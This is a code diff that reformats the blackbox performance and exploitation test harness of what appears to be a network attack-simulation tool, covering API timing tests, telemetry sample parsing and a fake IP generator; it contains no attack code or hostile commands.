def test_telem_performance(self, island_client, quick_performance_tests):
|
def test_telem_performance(self, island_client, quick_performance_tests):
|
||||||
TelemetryPerformanceTest(island_client, quick_performance_tests).test_telemetry_performance()
|
TelemetryPerformanceTest(
|
||||||
|
island_client, quick_performance_tests
|
||||||
|
).test_telemetry_performance()
|
||||||
|
|
|
@ -2,7 +2,6 @@ import abc
|
||||||
|
|
||||||
|
|
||||||
class BasicTest(abc.ABC):
|
class BasicTest(abc.ABC):
|
||||||
|
|
||||||
@abc.abstractmethod
|
@abc.abstractmethod
|
||||||
def run(self):
|
def run(self):
|
||||||
pass
|
pass
|
||||||
|
|
|
@ -13,7 +13,6 @@ LOGGER = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
class ExploitationTest(BasicTest):
|
class ExploitationTest(BasicTest):
|
||||||
|
|
||||||
def __init__(self, name, island_client, raw_config, analyzers, timeout, log_handler):
|
def __init__(self, name, island_client, raw_config, analyzers, timeout, log_handler):
|
||||||
self.name = name
|
self.name = name
|
||||||
self.island_client = island_client
|
self.island_client = island_client
|
||||||
|
@ -48,18 +47,25 @@ class ExploitationTest(BasicTest):
|
||||||
self.log_success(timer)
|
self.log_success(timer)
|
||||||
return
|
return
|
||||||
sleep(DELAY_BETWEEN_ANALYSIS)
|
sleep(DELAY_BETWEEN_ANALYSIS)
|
||||||
LOGGER.debug("Waiting until all analyzers passed. Time passed: {}".format(timer.get_time_taken()))
|
LOGGER.debug(
|
||||||
|
"Waiting until all analyzers passed. Time passed: {}".format(timer.get_time_taken())
|
||||||
|
)
|
||||||
self.log_failure(timer)
|
self.log_failure(timer)
|
||||||
assert False
|
assert False
|
||||||
|
|
||||||
def log_success(self, timer):
|
def log_success(self, timer):
|
||||||
LOGGER.info(self.get_analyzer_logs())
|
LOGGER.info(self.get_analyzer_logs())
|
||||||
LOGGER.info("{} test passed, time taken: {:.1f} seconds.".format(self.name, timer.get_time_taken()))
|
LOGGER.info(
|
||||||
|
"{} test passed, time taken: {:.1f} seconds.".format(self.name, timer.get_time_taken())
|
||||||
|
)
|
||||||
|
|
||||||
def log_failure(self, timer):
|
def log_failure(self, timer):
|
||||||
LOGGER.info(self.get_analyzer_logs())
|
LOGGER.info(self.get_analyzer_logs())
|
||||||
LOGGER.error("{} test failed because of timeout. Time taken: {:.1f} seconds.".format(self.name,
|
LOGGER.error(
|
||||||
timer.get_time_taken()))
|
"{} test failed because of timeout. Time taken: {:.1f} seconds.".format(
|
||||||
|
self.name, timer.get_time_taken()
|
||||||
|
)
|
||||||
|
)
|
||||||
|
|
||||||
def all_analyzers_pass(self):
|
def all_analyzers_pass(self):
|
||||||
analyzers_results = [analyzer.analyze_test_results() for analyzer in self.analyzers]
|
analyzers_results = [analyzer.analyze_test_results() for analyzer in self.analyzers]
|
||||||
|
@ -73,7 +79,10 @@ class ExploitationTest(BasicTest):
|
||||||
|
|
||||||
def wait_until_monkeys_die(self):
|
def wait_until_monkeys_die(self):
|
||||||
time_passed = 0
|
time_passed = 0
|
||||||
while not self.island_client.is_all_monkeys_dead() and time_passed < MAX_TIME_FOR_MONKEYS_TO_DIE:
|
while (
|
||||||
|
not self.island_client.is_all_monkeys_dead()
|
||||||
|
and time_passed < MAX_TIME_FOR_MONKEYS_TO_DIE
|
||||||
|
):
|
||||||
sleep(WAIT_TIME_BETWEEN_REQUESTS)
|
sleep(WAIT_TIME_BETWEEN_REQUESTS)
|
||||||
time_passed += WAIT_TIME_BETWEEN_REQUESTS
|
time_passed += WAIT_TIME_BETWEEN_REQUESTS
|
||||||
LOGGER.debug("Waiting for all monkeys to die. Time passed: {}".format(time_passed))
|
LOGGER.debug("Waiting for all monkeys to die. Time passed: {}".format(time_passed))
|
||||||
|
|
|
@ -10,7 +10,6 @@ LOGGER = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
class EndpointPerformanceTest(BasicTest):
|
class EndpointPerformanceTest(BasicTest):
|
||||||
|
|
||||||
def __init__(self, name, test_config: PerformanceTestConfig, island_client: MonkeyIslandClient):
|
def __init__(self, name, test_config: PerformanceTestConfig, island_client: MonkeyIslandClient):
|
||||||
self.name = name
|
self.name = name
|
||||||
self.test_config = test_config
|
self.test_config = test_config
|
||||||
|
@ -21,8 +20,9 @@ class EndpointPerformanceTest(BasicTest):
|
||||||
endpoint_timings = {}
|
endpoint_timings = {}
|
||||||
for endpoint in self.test_config.endpoints_to_test:
|
for endpoint in self.test_config.endpoints_to_test:
|
||||||
self.island_client.clear_caches()
|
self.island_client.clear_caches()
|
||||||
endpoint_timings[endpoint] = self.island_client.requests.get_request_time(endpoint,
|
endpoint_timings[endpoint] = self.island_client.requests.get_request_time(
|
||||||
SupportedRequestMethod.GET)
|
endpoint, SupportedRequestMethod.GET
|
||||||
|
)
|
||||||
analyzer = PerformanceAnalyzer(self.test_config, endpoint_timings)
|
analyzer = PerformanceAnalyzer(self.test_config, endpoint_timings)
|
||||||
|
|
||||||
return analyzer.analyze_test_results()
|
return analyzer.analyze_test_results()
|
||||||
|
|
|
@ -3,7 +3,9 @@ from datetime import timedelta
|
||||||
from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest
|
from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest
|
from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
|
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.performance_test_workflow import PerformanceTestWorkflow
|
from envs.monkey_zoo.blackbox.tests.performance.performance_test_workflow import (
|
||||||
|
PerformanceTestWorkflow,
|
||||||
|
)
|
||||||
|
|
||||||
MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2)
|
MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2)
|
||||||
MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5)
|
MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5)
|
||||||
|
@ -17,18 +19,22 @@ class MapGenerationTest(PerformanceTest):
|
||||||
|
|
||||||
TEST_NAME = "Map generation performance test"
|
TEST_NAME = "Map generation performance test"
|
||||||
|
|
||||||
def __init__(self, island_client, raw_config, analyzers,
|
def __init__(
|
||||||
timeout, log_handler, break_on_timeout):
|
self, island_client, raw_config, analyzers, timeout, log_handler, break_on_timeout
|
||||||
|
):
|
||||||
self.island_client = island_client
|
self.island_client = island_client
|
||||||
exploitation_test = ExploitationTest(MapGenerationTest.TEST_NAME, island_client,
|
exploitation_test = ExploitationTest(
|
||||||
raw_config, analyzers, timeout, log_handler)
|
MapGenerationTest.TEST_NAME, island_client, raw_config, analyzers, timeout, log_handler
|
||||||
performance_config = PerformanceTestConfig(max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
|
)
|
||||||
max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME,
|
performance_config = PerformanceTestConfig(
|
||||||
endpoints_to_test=MAP_RESOURCES,
|
max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
|
||||||
break_on_timeout=break_on_timeout)
|
max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME,
|
||||||
self.performance_test_workflow = PerformanceTestWorkflow(MapGenerationTest.TEST_NAME,
|
endpoints_to_test=MAP_RESOURCES,
|
||||||
exploitation_test,
|
break_on_timeout=break_on_timeout,
|
||||||
performance_config)
|
)
|
||||||
|
self.performance_test_workflow = PerformanceTestWorkflow(
|
||||||
|
MapGenerationTest.TEST_NAME, exploitation_test, performance_config
|
||||||
|
)
|
||||||
|
|
||||||
def run(self):
|
def run(self):
|
||||||
self.performance_test_workflow.run()
|
self.performance_test_workflow.run()
|
||||||
|
|
|
@ -2,8 +2,9 @@ from datetime import timedelta
|
||||||
|
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest
|
from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
|
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test_workflow import \
|
from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test_workflow import (
|
||||||
TelemetryPerformanceTestWorkflow
|
TelemetryPerformanceTestWorkflow,
|
||||||
|
)
|
||||||
|
|
||||||
MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2)
|
MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2)
|
||||||
MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5)
|
MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5)
|
||||||
|
@ -19,14 +20,18 @@ class MapGenerationFromTelemetryTest(PerformanceTest):
|
||||||
|
|
||||||
def __init__(self, island_client, quick_performance_test: bool, break_on_timeout=False):
|
def __init__(self, island_client, quick_performance_test: bool, break_on_timeout=False):
|
||||||
self.island_client = island_client
|
self.island_client = island_client
|
||||||
performance_config = PerformanceTestConfig(max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
|
performance_config = PerformanceTestConfig(
|
||||||
max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME,
|
max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
|
||||||
endpoints_to_test=MAP_RESOURCES,
|
max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME,
|
||||||
break_on_timeout=break_on_timeout)
|
endpoints_to_test=MAP_RESOURCES,
|
||||||
self.performance_test_workflow = TelemetryPerformanceTestWorkflow(MapGenerationFromTelemetryTest.TEST_NAME,
|
break_on_timeout=break_on_timeout,
|
||||||
self.island_client,
|
)
|
||||||
performance_config,
|
self.performance_test_workflow = TelemetryPerformanceTestWorkflow(
|
||||||
quick_performance_test)
|
MapGenerationFromTelemetryTest.TEST_NAME,
|
||||||
|
self.island_client,
|
||||||
|
performance_config,
|
||||||
|
quick_performance_test,
|
||||||
|
)
|
||||||
|
|
||||||
def run(self):
|
def run(self):
|
||||||
self.performance_test_workflow.run()
|
self.performance_test_workflow.run()
|
||||||
|
|
|
@ -4,10 +4,10 @@ from envs.monkey_zoo.blackbox.tests.basic_test import BasicTest
|
||||||
|
|
||||||
|
|
||||||
class PerformanceTest(BasicTest, metaclass=ABCMeta):
|
class PerformanceTest(BasicTest, metaclass=ABCMeta):
|
||||||
|
|
||||||
@abstractmethod
|
@abstractmethod
|
||||||
def __init__(self, island_client, raw_config, analyzers,
|
def __init__(
|
||||||
timeout, log_handler, break_on_timeout):
|
self, island_client, raw_config, analyzers, timeout, log_handler, break_on_timeout
|
||||||
|
):
|
||||||
pass
|
pass
|
||||||
|
|
||||||
@property
|
@property
|
||||||
|
|
|
@ -3,9 +3,13 @@ from typing import List
|
||||||
|
|
||||||
|
|
||||||
class PerformanceTestConfig:
|
class PerformanceTestConfig:
|
||||||
|
def __init__(
|
||||||
def __init__(self, max_allowed_single_page_time: timedelta, max_allowed_total_time: timedelta,
|
self,
|
||||||
endpoints_to_test: List[str] = None, break_on_timeout=False):
|
max_allowed_single_page_time: timedelta,
|
||||||
|
max_allowed_total_time: timedelta,
|
||||||
|
endpoints_to_test: List[str] = None,
|
||||||
|
break_on_timeout=False,
|
||||||
|
):
|
||||||
self.max_allowed_single_page_time = max_allowed_single_page_time
|
self.max_allowed_single_page_time = max_allowed_single_page_time
|
||||||
self.max_allowed_total_time = max_allowed_total_time
|
self.max_allowed_total_time = max_allowed_total_time
|
||||||
self.endpoints_to_test = endpoints_to_test
|
self.endpoints_to_test = endpoints_to_test
|
||||||
|
|
|
@ -1,12 +1,15 @@
|
||||||
from envs.monkey_zoo.blackbox.tests.basic_test import BasicTest
|
from envs.monkey_zoo.blackbox.tests.basic_test import BasicTest
|
||||||
from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest
|
from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.endpoint_performance_test import EndpointPerformanceTest
|
from envs.monkey_zoo.blackbox.tests.performance.endpoint_performance_test import (
|
||||||
|
EndpointPerformanceTest,
|
||||||
|
)
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
|
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
|
||||||
|
|
||||||
|
|
||||||
class PerformanceTestWorkflow(BasicTest):
|
class PerformanceTestWorkflow(BasicTest):
|
||||||
|
def __init__(
|
||||||
def __init__(self, name, exploitation_test: ExploitationTest, performance_config: PerformanceTestConfig):
|
self, name, exploitation_test: ExploitationTest, performance_config: PerformanceTestConfig
|
||||||
|
):
|
||||||
self.name = name
|
self.name = name
|
||||||
self.exploitation_test = exploitation_test
|
self.exploitation_test = exploitation_test
|
||||||
self.island_client = exploitation_test.island_client
|
self.island_client = exploitation_test.island_client
|
||||||
|
@ -25,7 +28,9 @@ class PerformanceTestWorkflow(BasicTest):
|
||||||
self.exploitation_test.wait_for_monkey_process_to_finish()
|
self.exploitation_test.wait_for_monkey_process_to_finish()
|
||||||
if not self.island_client.is_all_monkeys_dead():
|
if not self.island_client.is_all_monkeys_dead():
|
||||||
raise RuntimeError("Can't test report times since not all Monkeys have died.")
|
raise RuntimeError("Can't test report times since not all Monkeys have died.")
|
||||||
performance_test = EndpointPerformanceTest(self.name, self.performance_config, self.island_client)
|
performance_test = EndpointPerformanceTest(
|
||||||
|
self.name, self.performance_config, self.island_client
|
||||||
|
)
|
||||||
try:
|
try:
|
||||||
if not self.island_client.is_all_monkeys_dead():
|
if not self.island_client.is_all_monkeys_dead():
|
||||||
raise RuntimeError("Can't test report times since not all Monkeys have died.")
|
raise RuntimeError("Can't test report times since not all Monkeys have died.")
|
||||||
|
|
|
@ -3,7 +3,9 @@ from datetime import timedelta
|
||||||
from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest
|
from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest
|
from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
|
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.performance_test_workflow import PerformanceTestWorkflow
|
from envs.monkey_zoo.blackbox.tests.performance.performance_test_workflow import (
|
||||||
|
PerformanceTestWorkflow,
|
||||||
|
)
|
||||||
|
|
||||||
MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2)
|
MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2)
|
||||||
MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5)
|
MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5)
|
||||||
|
@ -13,25 +15,34 @@ REPORT_RESOURCES = [
|
||||||
"api/attack/report",
|
"api/attack/report",
|
||||||
"api/report/zero_trust/findings",
|
"api/report/zero_trust/findings",
|
||||||
"api/report/zero_trust/principles",
|
"api/report/zero_trust/principles",
|
||||||
"api/report/zero_trust/pillars"
|
"api/report/zero_trust/pillars",
|
||||||
]
|
]
|
||||||
|
|
||||||
|
|
||||||
class ReportGenerationTest(PerformanceTest):
|
class ReportGenerationTest(PerformanceTest):
|
||||||
TEST_NAME = "Report generation performance test"
|
TEST_NAME = "Report generation performance test"
|
||||||
|
|
||||||
def __init__(self, island_client, raw_config, analyzers,
|
def __init__(
|
||||||
timeout, log_handler, break_on_timeout):
|
self, island_client, raw_config, analyzers, timeout, log_handler, break_on_timeout
|
||||||
|
):
|
||||||
self.island_client = island_client
|
self.island_client = island_client
|
||||||
exploitation_test = ExploitationTest(ReportGenerationTest.TEST_NAME, island_client,
|
exploitation_test = ExploitationTest(
|
||||||
raw_config, analyzers, timeout, log_handler)
|
ReportGenerationTest.TEST_NAME,
|
||||||
performance_config = PerformanceTestConfig(max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
|
island_client,
|
||||||
max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME,
|
raw_config,
|
||||||
endpoints_to_test=REPORT_RESOURCES,
|
analyzers,
|
||||||
break_on_timeout=break_on_timeout)
|
timeout,
|
||||||
self.performance_test_workflow = PerformanceTestWorkflow(ReportGenerationTest.TEST_NAME,
|
log_handler,
|
||||||
exploitation_test,
|
)
|
||||||
performance_config)
|
performance_config = PerformanceTestConfig(
|
||||||
|
max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
|
||||||
|
max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME,
|
||||||
|
endpoints_to_test=REPORT_RESOURCES,
|
||||||
|
break_on_timeout=break_on_timeout,
|
||||||
|
)
|
||||||
|
self.performance_test_workflow = PerformanceTestWorkflow(
|
||||||
|
ReportGenerationTest.TEST_NAME, exploitation_test, performance_config
|
||||||
|
)
|
||||||
|
|
||||||
def run(self):
|
def run(self):
|
||||||
self.performance_test_workflow.run()
|
self.performance_test_workflow.run()
|
||||||
|
|
|
@ -2,8 +2,9 @@ from datetime import timedelta
|
||||||
|
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest
|
from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
|
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test_workflow import \
|
from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test_workflow import (
|
||||||
TelemetryPerformanceTestWorkflow
|
TelemetryPerformanceTestWorkflow,
|
||||||
|
)
|
||||||
|
|
||||||
MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2)
|
MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2)
|
||||||
MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5)
|
MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5)
|
||||||
|
@ -13,7 +14,7 @@ REPORT_RESOURCES = [
|
||||||
"api/attack/report",
|
"api/attack/report",
|
||||||
"api/report/zero_trust/findings",
|
"api/report/zero_trust/findings",
|
||||||
"api/report/zero_trust/principles",
|
"api/report/zero_trust/principles",
|
||||||
"api/report/zero_trust/pillars"
|
"api/report/zero_trust/pillars",
|
||||||
]
|
]
|
||||||
|
|
||||||
|
|
||||||
|
@ -23,14 +24,18 @@ class ReportGenerationFromTelemetryTest(PerformanceTest):
|
||||||
|
|
||||||
def __init__(self, island_client, quick_performance_test, break_on_timeout=False):
|
def __init__(self, island_client, quick_performance_test, break_on_timeout=False):
|
||||||
self.island_client = island_client
|
self.island_client = island_client
|
||||||
performance_config = PerformanceTestConfig(max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
|
performance_config = PerformanceTestConfig(
|
||||||
max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME,
|
max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
|
||||||
endpoints_to_test=REPORT_RESOURCES,
|
max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME,
|
||||||
break_on_timeout=break_on_timeout)
|
endpoints_to_test=REPORT_RESOURCES,
|
||||||
self.performance_test_workflow = TelemetryPerformanceTestWorkflow(ReportGenerationFromTelemetryTest.TEST_NAME,
|
break_on_timeout=break_on_timeout,
|
||||||
self.island_client,
|
)
|
||||||
performance_config,
|
self.performance_test_workflow = TelemetryPerformanceTestWorkflow(
|
||||||
quick_performance_test)
|
ReportGenerationFromTelemetryTest.TEST_NAME,
|
||||||
|
self.island_client,
|
||||||
|
performance_config,
|
||||||
|
quick_performance_test,
|
||||||
|
)
|
||||||
|
|
||||||
def run(self):
|
def run(self):
|
||||||
self.performance_test_workflow.run()
|
self.performance_test_workflow.run()
|
||||||
|
|
|
@ -5,39 +5,43 @@ from typing import Dict, List
|
||||||
|
|
||||||
from tqdm import tqdm
|
from tqdm import tqdm
|
||||||
|
|
||||||
TELEM_DIR_PATH = './tests/performance/telem_sample'
|
TELEM_DIR_PATH = "./tests/performance/telem_sample"
|
||||||
MAX_SAME_TYPE_TELEM_FILES = 10000
|
MAX_SAME_TYPE_TELEM_FILES = 10000
|
||||||
LOGGER = logging.getLogger(__name__)
|
LOGGER = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
class SampleFileParser:
|
class SampleFileParser:
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def save_teletries_to_files(telems: List[Dict]):
|
def save_teletries_to_files(telems: List[Dict]):
|
||||||
for telem in (tqdm(telems, desc="Telemetries saved to files", position=3)):
|
for telem in tqdm(telems, desc="Telemetries saved to files", position=3):
|
||||||
SampleFileParser.save_telemetry_to_file(telem)
|
SampleFileParser.save_telemetry_to_file(telem)
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def save_telemetry_to_file(telem: Dict):
|
def save_telemetry_to_file(telem: Dict):
|
||||||
telem_filename = telem['name'] + telem['method']
|
telem_filename = telem["name"] + telem["method"]
|
||||||
for i in range(MAX_SAME_TYPE_TELEM_FILES):
|
for i in range(MAX_SAME_TYPE_TELEM_FILES):
|
||||||
if not path.exists(path.join(TELEM_DIR_PATH, (str(i) + telem_filename))):
|
if not path.exists(path.join(TELEM_DIR_PATH, (str(i) + telem_filename))):
|
||||||
telem_filename = str(i) + telem_filename
|
telem_filename = str(i) + telem_filename
|
||||||
break
|
break
|
||||||
with open(path.join(TELEM_DIR_PATH, telem_filename), 'w') as file:
|
with open(path.join(TELEM_DIR_PATH, telem_filename), "w") as file:
|
||||||
file.write(json.dumps(telem))
|
file.write(json.dumps(telem))
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def read_telem_files() -> List[str]:
|
def read_telem_files() -> List[str]:
|
||||||
telems = []
|
telems = []
|
||||||
try:
|
try:
|
||||||
file_paths = [path.join(TELEM_DIR_PATH, f) for f in listdir(TELEM_DIR_PATH)
|
file_paths = [
|
||||||
if path.isfile(path.join(TELEM_DIR_PATH, f))]
|
path.join(TELEM_DIR_PATH, f)
|
||||||
|
for f in listdir(TELEM_DIR_PATH)
|
||||||
|
if path.isfile(path.join(TELEM_DIR_PATH, f))
|
||||||
|
]
|
||||||
except FileNotFoundError:
|
except FileNotFoundError:
|
||||||
raise FileNotFoundError("Telemetries to send not found. "
|
raise FileNotFoundError(
|
||||||
"Refer to readme to figure out how to generate telemetries and where to put them.")
|
"Telemetries to send not found. "
|
||||||
|
"Refer to readme to figure out how to generate telemetries and where to put them."
|
||||||
|
)
|
||||||
for file_path in file_paths:
|
for file_path in file_paths:
|
||||||
with open(file_path, 'r') as telem_file:
|
with open(file_path, "r") as telem_file:
|
||||||
telem_string = "".join(telem_file.readlines()).replace("\n", "")
|
telem_string = "".join(telem_file.readlines()).replace("\n", "")
|
||||||
telems.append(telem_string)
|
telems.append(telem_string)
|
||||||
return telems
|
return telems
|
||||||
|
|
|
@ -8,7 +8,7 @@ class FakeIpGenerator:
|
||||||
def generate_fake_ips_for_real_ips(self, real_ips: List[str]) -> List[str]:
|
def generate_fake_ips_for_real_ips(self, real_ips: List[str]) -> List[str]:
|
||||||
fake_ips = []
|
fake_ips = []
|
||||||
for i in range(len(real_ips)):
|
for i in range(len(real_ips)):
|
||||||
fake_ips.append('.'.join(str(part) for part in self.fake_ip_parts))
|
fake_ips.append(".".join(str(part) for part in self.fake_ip_parts))
|
||||||
self.increment_ip()
|
self.increment_ip()
|
||||||
return fake_ips
|
return fake_ips
|
||||||
|
|
||||||
|
@ -19,7 +19,7 @@ class FakeIpGenerator:
|
||||||
def try_fix_ip_range(self):
|
def try_fix_ip_range(self):
|
||||||
for i in range(len(self.fake_ip_parts)):
|
for i in range(len(self.fake_ip_parts)):
|
||||||
if self.fake_ip_parts[i] > 256:
|
if self.fake_ip_parts[i] > 256:
|
||||||
if i-1 < 0:
|
if i - 1 < 0:
|
||||||
raise Exception("Fake IP's out of range.")
|
raise Exception("Fake IP's out of range.")
|
||||||
self.fake_ip_parts[i-1] += 1
|
self.fake_ip_parts[i - 1] += 1
|
||||||
self.fake_ip_parts[i] = 1
|
self.fake_ip_parts[i] = 1
|
||||||
|
|
|
@ -1,7 +1,8 @@
|
||||||
import random
|
import random
|
||||||
|
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import \
|
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import (
|
||||||
FakeIpGenerator
|
FakeIpGenerator,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
class FakeMonkey:
|
class FakeMonkey:
|
||||||
|
|
|
@ -6,24 +6,28 @@ from typing import Dict, List
|
||||||
|
|
||||||
from tqdm import tqdm
|
from tqdm import tqdm
|
||||||
|
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_file_parser import SampleFileParser
|
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_file_parser import (
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import \
|
SampleFileParser,
|
||||||
FakeIpGenerator
|
)
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_monkey import FakeMonkey
|
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import (
|
||||||
|
FakeIpGenerator,
|
||||||
|
)
|
||||||
|
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_monkey import (
|
||||||
|
FakeMonkey,
|
||||||
|
)
|
||||||
|
|
||||||
TELEM_DIR_PATH = './tests/performance/telemetry_sample'
|
TELEM_DIR_PATH = "./tests/performance/telemetry_sample"
|
||||||
LOGGER = logging.getLogger(__name__)
|
LOGGER = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
class SampleMultiplier:
|
class SampleMultiplier:
|
||||||
|
|
||||||
def __init__(self, multiplier: int):
|
def __init__(self, multiplier: int):
|
||||||
self.multiplier = multiplier
|
self.multiplier = multiplier
|
||||||
self.fake_ip_generator = FakeIpGenerator()
|
self.fake_ip_generator = FakeIpGenerator()
|
||||||
|
|
||||||
def multiply_telems(self):
|
def multiply_telems(self):
|
||||||
telems = SampleFileParser.get_all_telemetries()
|
telems = SampleFileParser.get_all_telemetries()
|
||||||
telem_contents = [json.loads(telem['content']) for telem in telems]
|
telem_contents = [json.loads(telem["content"]) for telem in telems]
|
||||||
monkeys = self.get_monkeys_from_telems(telem_contents)
|
monkeys = self.get_monkeys_from_telems(telem_contents)
|
||||||
for i in tqdm(range(self.multiplier), desc="Batch of fabricated telemetries", position=1):
|
for i in tqdm(range(self.multiplier), desc="Batch of fabricated telemetries", position=1):
|
||||||
for monkey in monkeys:
|
for monkey in monkeys:
|
||||||
|
@ -40,46 +44,61 @@ class SampleMultiplier:
|
||||||
for monkey in monkeys:
|
for monkey in monkeys:
|
||||||
if monkey.on_island:
|
if monkey.on_island:
|
||||||
continue
|
continue
|
||||||
if (monkey.original_guid in telem['content'] or monkey.original_guid in telem['endpoint']) \
|
if (
|
||||||
and not monkey.on_island:
|
monkey.original_guid in telem["content"]
|
||||||
telem['content'] = telem['content'].replace(monkey.original_guid, monkey.fake_guid)
|
or monkey.original_guid in telem["endpoint"]
|
||||||
telem['endpoint'] = telem['endpoint'].replace(monkey.original_guid, monkey.fake_guid)
|
) and not monkey.on_island:
|
||||||
|
telem["content"] = telem["content"].replace(
|
||||||
|
monkey.original_guid, monkey.fake_guid
|
||||||
|
)
|
||||||
|
telem["endpoint"] = telem["endpoint"].replace(
|
||||||
|
monkey.original_guid, monkey.fake_guid
|
||||||
|
)
|
||||||
for i in range(len(monkey.original_ips)):
|
for i in range(len(monkey.original_ips)):
|
||||||
telem['content'] = telem['content'].replace(monkey.original_ips[i], monkey.fake_ips[i])
|
telem["content"] = telem["content"].replace(
|
||||||
|
monkey.original_ips[i], monkey.fake_ips[i]
|
||||||
|
)
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def offset_telem_times(iteration: int, telems: List[Dict]):
|
def offset_telem_times(iteration: int, telems: List[Dict]):
|
||||||
for telem in telems:
|
for telem in telems:
|
||||||
telem['time']['$date'] += iteration * 1000
|
telem["time"]["$date"] += iteration * 1000
|
||||||
|
|
||||||
def get_monkeys_from_telems(self, telems: List[Dict]):
|
def get_monkeys_from_telems(self, telems: List[Dict]):
|
||||||
island_ips = SampleMultiplier.get_island_ips_from_telems(telems)
|
island_ips = SampleMultiplier.get_island_ips_from_telems(telems)
|
||||||
monkeys = []
|
monkeys = []
|
||||||
for telem in [telem for telem in telems
|
for telem in [
|
||||||
if 'telem_category' in telem and telem['telem_category'] == 'system_info']:
|
telem
|
||||||
if 'network_info' not in telem['data']:
|
for telem in telems
|
||||||
|
if "telem_category" in telem and telem["telem_category"] == "system_info"
|
||||||
|
]:
|
||||||
|
if "network_info" not in telem["data"]:
|
||||||
continue
|
continue
|
||||||
guid = telem['monkey_guid']
|
guid = telem["monkey_guid"]
|
||||||
monkey_present = [monkey for monkey in monkeys if monkey.original_guid == guid]
|
